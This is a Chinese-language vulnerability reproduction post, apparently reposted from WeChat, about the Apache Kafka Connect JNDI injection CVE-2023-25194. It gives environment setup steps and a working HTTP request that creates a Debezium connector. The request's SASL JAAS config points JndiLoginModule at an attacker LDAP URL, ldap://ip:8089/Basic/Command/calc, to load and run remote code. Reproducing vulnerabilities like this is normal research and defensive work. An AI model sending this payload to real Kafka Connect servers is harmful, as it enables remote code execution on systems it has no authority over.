Apache Kafka JNDI注入漏洞(CVE-2023-25194)
2023-3-9 09:16:31 Author: 阿乐你好(查看原文) 阅读量:130 收藏

搭建漏洞环境(如果启动报错建议更换为JAVA11)

kafka_2.11-2.4.0.rar(74.6 MB)

http://archive.apache.org/dist/kafka/2.4.0/kafka_2.11-2.4.0.tgz

启动命令

  • binwindowszookeeper-server-start.bat configzookeeper.properties

  • binwindowskafka-server-start.bat configserver.properties

  • binwindowsconnect-standalone.bat config/connect-standalone.properties config/connect-file-source.properties config/connect-file-sink.properties

如果提示 输入行太长 命令语法不正确,输入:

  • set CLASSPATH=

漏洞复现

访问http://127.0.0.1:8083/connector-plugins查看是否存在依赖

展开

注:需要对数据库进行配置(时区设置)

查看time_zone变量

  • show variables like '%time_zone%';

设置时期:

  • set time_zone='+8:00';

  • show variables like '%time_zone%';

POC代码如下:

接着使用如下请求包创建连接器

  • POST /connectors HTTP/1.1

  • Host: 127.0.0.1:8083

  • Content-Type: application/json

  • Content-Length: 821

  • {

  • "name": "debezium-test-50173",

  • "config": {

  • "connector.class": "io.debezium.connector.mysql.MySqlConnector",

  • "database.hostname": "127.0.0.1",

  • "database.port": "3306",

  • "database.user": "root",

  • "database.password": "root",

  • "database.server.id": "316545017",

  • "database.server.name": "test1",

  • "database.history.kafka.bootstrap.servers": "127.0.0.1:9092",

  • "database.history.kafka.topic": "quickstart-events", "database.history.producer.security.protocol": "SASL_SSL",

  • "database.history.producer.sasl.mechanism": "PLAIN",

  • "database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://ip:8089/Basic/Command/calc" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";"

  • }

  • }

相关连接:

https://www.yuque.com/yuqueyonghukcxcby/wwdc80/yntiuyx4a6gnpn1zhttps://github.com/ohnonoyesyes/CVE-2023-25194

文章来源: http://mp.weixin.qq.com/s?__biz=MzIxNTIzNTExMQ==&mid=2247489145&idx=1&sn=bedc2017bf1ea95518240c625d371033&chksm=979a3931a0edb027e20c1434be4281fca24f2c3ac4de4cd583723c2029b39ac7c0f5f974af4e#rd
如有侵权请联系:admin#unsafe.sh